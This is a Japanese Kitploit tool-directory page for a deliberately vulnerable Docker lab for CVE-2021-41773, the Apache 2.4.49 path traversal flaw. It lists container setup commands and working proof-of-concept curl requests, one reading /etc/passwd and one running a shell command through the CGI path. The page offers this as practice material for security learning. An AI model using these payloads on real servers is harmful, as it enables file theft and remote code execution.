Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41773 — CVE-2021-41773用の脆弱なDockerイメージ | Kitploit
ツール/GitHubGitHub/blueteamsteve/cve-2021-41773
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubblueteamsteve/cve-2021-41773

CVE-2021-41773

CVE-2021-41773用の脆弱なDockerイメージ

リポジトリを見る
23824年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41773 Apacheパストラバーサル用の脆弱なDockerイメージ

この脆弱性は、特定の非デフォルト設定を持つバージョン2.4.49 のみに適用されます。状況によっては、ファイル読み取りまたはコード実行につながる可能性があります。

tweet https://twitter.com/ptswarm/status/1445376079548624899

脆弱なファイル読み取り設定

コンテナはDocker Hubから直接プルできます。

docker pull blueteamsteve/cve-2021-41773:no-cgid

以下のコマンドで実行します。

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Apacheのログは以下で確認できます。または上記の実行コマンドから "-dit" を除外して stdio をストリームすることもできます。 docker logs <container-id>

ファイル読み取りのPoC

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

脆弱なRCE設定

コンテナはDocker Hubから直接プルできます。

docker pull blueteamsteve/cve-2021-41773:with-cgid

以下のコマンドで実行します。

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Apacheのログは以下で確認できます。または上記の実行コマンドから "-dit" を除外して stdio をストリームすることもできます。 docker logs <container-id>

RCEのPoC

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

カスタムDockerコンテナのビルド

サブディレクトリ内のdockerfileとテンプレートhttpd.confファイルを使用して、独自のバージョンを変更・ビルドしてください。

  • ファイル読み取りに脆弱な設定には ./no-cgi を使用
  • コード実行に脆弱な設定には ./with-cgi を使用
ツールをダウンロード